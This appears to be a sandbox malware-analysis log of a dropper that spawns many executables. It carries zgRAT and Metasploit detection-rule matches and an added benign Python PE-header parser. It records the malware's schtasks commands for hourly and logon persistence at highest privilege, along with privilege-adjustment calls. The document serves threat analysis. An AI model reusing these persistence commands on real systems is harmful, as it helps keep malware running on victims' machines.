Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E55BD7 17_2_61E55BD7
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EA5B62 17_2_61EA5B62
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E91DC1 17_2_61E91DC1
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E6DDA5 17_2_61E6DDA5
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E31DAB 17_2_61E31DAB
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E95D7A 17_2_61E95D7A
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E5BC4C 17_2_61E5BC4C
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E25FA2 17_2_61E25FA2
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E1DEC2 17_2_61E1DEC2
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E69E8F 17_2_61E69E8F
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E89E0E 17_2_61E89E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Security
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0053E310 appears 39 times
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8032 -ip 8032
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegithubsoft.exe$ vs gobEmOm5sr.exe
Source: gobEmOm5sr.exe, 00000000.00000002.1663531403.0000000005A90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamewMwlL.dll0 vs gobEmOm5sr.exe
Source: gobEmOm5sr.exe, 00000000.00000002.1654904203.0000000004EF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs gobEmOm5sr.exe
Source: gobEmOm5sr.exe, 00000000.00000002.1653570036.00000000013BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs gobEmOm5sr.exe
Source: gobEmOm5sr.exe, 00000000.00000002.1663150655.0000000005790000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamePE.dll& vs gobEmOm5sr.exe
Source: gobEmOm5sr.exe, 00000000.00000002.1654904203.00000000050CF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs gobEmOm5sr.exe
Source: gobEmOm5sr.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
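The static PE line lists the IMAGE_FILE_HEADER characteristics the linker set on the submitted file: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED and 32BIT_MACHINE together are the raw value 0x010E. The OriginalFilename lines just above come from a different place: the version resource of whatever image was present in each memory dump, so `githubsoft.exe` is the on-disk file's own resource (a mismatch against a sandbox-renamed sample name is expected and not itself suspicious), while `PDFReader.exe`, `wMwlL.dll` and `PE.dll` were read from heap and private memory at the second snapshot and point at modules the loader unpacked or staged. The following Python, added here as an example and not part of the report, decodes the characteristics field directly from the COFF header without a third-party module and runs the consistency checks a reviewer would want on that value; the PE bytes it parses are constructed in `build_minimal_pe` and are not the sample.

```python
import struct

# IMAGE_FILE_HEADER.Characteristics bits, per the PE/COFF specification.
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED", 0x2000: "DLL",
}
MACHINES = {0x014C: "I386", 0x8664: "AMD64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}

def decode_characteristics(value):
    """Names of the set bits, lowest bit first (the order the report prints them in)."""
    return [name for bit, name in sorted(CHARACTERISTICS.items()) if value & bit]

def coff_header(data):
    """Parse the COFF file header of a PE image from raw bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)          # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    machine, nsect, _stamp, _symtab, _nsyms, _optsize, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": nsect,
        "raw_characteristics": chars,
        "characteristics": decode_characteristics(chars),
        "is_dll": bool(chars & 0x2000),
    }

def consistency_warnings(hdr):
    """Checks the flag list alone does not answer."""
    flags = set(hdr["characteristics"])
    warnings = []
    if "32BIT_MACHINE" in flags and hdr["machine"] != "I386":
        warnings.append("32BIT_MACHINE set but machine is not I386")
    if "EXECUTABLE_IMAGE" not in flags:
        warnings.append("linker did not mark the image executable")
    if "RELOCS_STRIPPED" in flags:
        warnings.append("relocations stripped: image cannot be relocated by ASLR")
    return warnings

def build_minimal_pe(machine=0x014C, characteristics=0x010E, sections=3):
    """Constructed test image: DOS header, PE signature and COFF header only (not a loadable file)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew points right after the DOS header
    coff = struct.pack("<HHIIIHH", machine, sections, 0, 0, 0, 0xE0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff

if __name__ == "__main__":
    hdr = coff_header(build_minimal_pe())
    print(hdr["machine"], ", ".join(hdr["characteristics"]), consistency_warnings(hdr) or "no warnings")
```

Pointing `coff_header` at the bytes of a real file (`open(path, "rb").read()`) reproduces the report's flag list; 0x010E decodes to exactly the four names shown, with no DLL bit and relocations kept, which is the profile of an ordinary 32-bit .NET executable rather than a shellcode-style flat image.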
Source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000000A.00000002.2204897517.000000000196E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000010.00000002.2284303938.00000000027E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000A.00000002.2204897517.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000010.00000002.2284303938.0000000002B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Ca01BQGh9DxiBOJwup.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Ca01BQGh9DxiBOJwup.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@95/138@13/24
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 7_2_00409448
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource, 7_2_00409BEC
Source: C:\Users\user\Desktop\gobEmOm5sr.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gobEmOm5sr.exe.log
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8032
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\UipomonaWW_2
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8024
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Mutant created: \Sessions\1\BaseNamedObjects\IntelPowerEExpert
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe File created: C:\Users\user\AppData\Local\Temp\is-9E297.tmp
Source: gobEmOm5sr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gobEmOm5sr.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Program Files (x86)\desktop.ini
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: gobEmOm5sr.exe ReversingLabs: Detection: 55%
Source: gobEmOm5sr.exe Virustotal: Detection: 53%
Source: lenTsqDIajevXTuJaJ03oKGb.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\gobEmOm5sr.exe "C:\Users\user\Desktop\gobEmOm5sr.exe"
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8032 -ip 8032
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Process created: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp "C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp" /SL5="$20496,3169907,54272,C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8024 -ip 8024
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 852
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 824
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe "C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe"
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Process created: C:\Users\user\AppData\Local\NewStar\newstar.exe "C:\Users\user\AppData\Local\NewStar\newstar.exe" -i
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: unknown Process created: C:\ProgramData\jewkkwnf\jewkkwnf.exe C:\ProgramData\jewkkwnf\jewkkwnf.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\SysWOW64\WerFault.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe "C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe"
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Process created: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp "C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp" /SL5="$20496,3169907,54272,C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe"
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8032 -ip 8032
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8024 -ip 8024
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 852
